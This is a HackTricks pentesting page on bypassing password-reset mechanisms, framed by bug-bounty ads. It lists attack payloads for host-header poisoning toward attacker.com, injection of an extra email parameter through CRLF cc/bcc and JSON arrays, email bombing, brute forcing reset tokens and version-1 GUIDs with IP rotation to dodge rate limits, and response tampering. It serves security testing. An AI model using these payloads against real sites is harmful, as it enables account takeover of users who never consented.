Skip to content

Latest commit

 

History

History
357 lines (239 loc) · 13.3 KB

reset-password.md

File metadata and controls

357 lines (239 loc) · 13.3 KB

Reset/Forgotten Password Bypass

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

HackenProof is home to all crypto bug bounties.

Get rewarded without delays
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.

Get experience in web3 pentesting
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.

Become the web3 hacker legend
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.

Sign up on HackenProof start earning from your hacks!

{% embed url="https://hackenproof.com/register" %}

The following techniques recompilation was taken from https://anugrahsr.github.io/posts/10-Password-reset-flaws/

Password Reset Token Leak Via Referrer

The HTTP referer is an optional HTTP header field that identifies the address of the webpage which is linked to the resource being requested. The Referer request header contains the address of the previous web page from which a link to the currently requested page was followed

Exploitation

  • Request password reset to your email address
  • Click on the password reset link
  • Dont change password
  • Click any 3rd party websites(eg: Facebook, twitter)
  • Intercept the request in burpsuite proxy
  • Check if the referer header is leaking password reset token.

Impact

It allows the person who has control of particular site to change the user’s password (CSRF attack), because this person knows reset password token of the user.

Reference:

Password Reset Poisoning

If you find a host header attack and it’s out of scope, try to find the password reset button!

Exploitation

  • Intercept the password reset request in Burpsuite
  • Add following header or edit header in burpsuite(try one by one)
Host: attacker.com
 Host: target.com
 X-Forwarded-Host: attacker.com
 Host: target.com
 Host: attacker.com
  • Check if the link to change the password inside the email is pointing to attacker.com

Patch

Use $_SERVER['SERVER_NAME'] rather than $_SERVER['HTTP_HOST']

$resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";

Impact

The victim will receive the malicious link in their email, and, when clicked, will leak the user’s password reset link / token to the attacker, leading to full account takeover.

Reference:

Password Reset By Manipulating Email Parameter

Exploitation

  • Add attacker email as second parameter using &
POST /resetPassword
[...]
[email protected]&[email protected]
  • Add attacker email as second parameter using %20
POST /resetPassword
[...]
[email protected]%20[email protected]
  • Add attacker email as second parameter using |
POST /resetPassword
[...]
[email protected]|[email protected]
  • Add attacker email as second parameter using cc
POST /resetPassword
[...]
email="[email protected]%0a%0dcc:[email protected]"
  • Add attacker email as second parameter using bcc
POST /resetPassword
[...]
email="[email protected]%0a%0dbcc:[email protected]"
  • Add attacker email as second parameter using ,
POST /resetPassword
[...]
email="[email protected]",email="[email protected]"
  • Add attacker email as second parameter in json array
POST /resetPassword
[...]
{"email":["[email protected]","[email protected]"]}

Reference

Changing Email And Password of any User through API Parameters

Exploitation

  • Attacker have to login with their account and Go to the Change password function
  • Start the Burp Suite and Intercept the request
  • After intercepting the request sent it to repeater and modify parameters Email and Password
POST /api/changepass
[...]
("form": {"email":"[email protected]","password":"12345678"})

Reference

No Rate Limiting: Email Bombing

Exploitation

  • Start the Burp Suite and Intercept the password reset request
  • Send to intruder
  • Use null payload

Reference

Find out How Password Reset Token is Generated

Figure out the pattern of password reset token

If it

  • Generated based Timestamp
  • Generated based on the UserID
  • Generated based on email of User
  • Generated based on Firstname and Lastname
  • Generated based on Date of Birth
  • Generated based on Cryptography

Use Burp Sequencer to find the randomness or predictability of tokens.

Guessable GUID

There are different types of GUIDs:

  • Version 0: Only seen in the nil GUID ("00000000-0000-0000-0000-000000000000").
  • Version 1: The GUID is generated in a predictable manner based on:
    • The current time
    • A randomly generated "clock sequence" which remains constant between GUIDs during the uptime of the generating system
    • A "node ID", which is generated based on the system's MAC address if it is available
  • Version 3: The GUID is generated using an MD5 hash of a provided name and namespace.
  • Version 4: The GUID is randomly generated.
  • Version 5: The GUID is generated using a SHA1 hash of a provided name and namespace.

It's possible to take a look to a GUID and find out its version, there is a small tool for that: guidtool****

guidtool -i 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c
UUID version: 1
UUID time: 2021-11-17 17:52:18.141000
UUID timestamp: 138564643381410000
UUID node: 17547390002044
UUID MAC address: 0f:f5:91:f2:a3:7c
UUID clock sequence: 3426

If the used version to generate a reset password GUID is the version 1, it's possible to bruteforce GUIDS:

guidtool 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000
a34aca00-47d0-11ec-8d62-0ff591f2a37c
a34af110-47d0-11ec-8d62-0ff591f2a37c

References

Response manipulation: Replace Bad Response With Good One

Look for Request and Response like these

HTTP/1.1 401 Unauthorized
(“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)

Change Response

HTTP/1.1 200 OK
(“message”:”success”,”statusCode:200,”errorDescription”:”Success”)

Reference

Using Expired Token

  • Check if the expired token can be reused

Brute Force Password Rest token

Try to bruteforce the reset token using Burpsuite

POST /resetPassword
[...]
[email protected]&code=$BRUTE$
  • Use IP-Rotator on burpsuite to bypass IP based ratelimit.

Reference

Try Using Your Token

  • Try adding your password reset token with victim’s Account
POST /resetPassword
[...]
[email protected]&code=$YOUR_TOKEN$

Reference

Session Invalidation in Logout/Password Reset

When a user logs out or reset his password, the current session should be invalidated.
Therefore, grab the cookies while the user is logged in, log out, and check if the cookies are still valid.
Repeat the process changing the password instead of logging out.

Reset Token expiration Time

The reset tokens must have an expiration time, after it the token shouldn't be valid to change the password of a user.

Extra Checks

HackenProof is home to all crypto bug bounties.

Get rewarded without delays
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.

Get experience in web3 pentesting
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.

Become the web3 hacker legend
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.

Sign up on HackenProof start earning from your hacks!

{% embed url="https://hackenproof.com/register" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥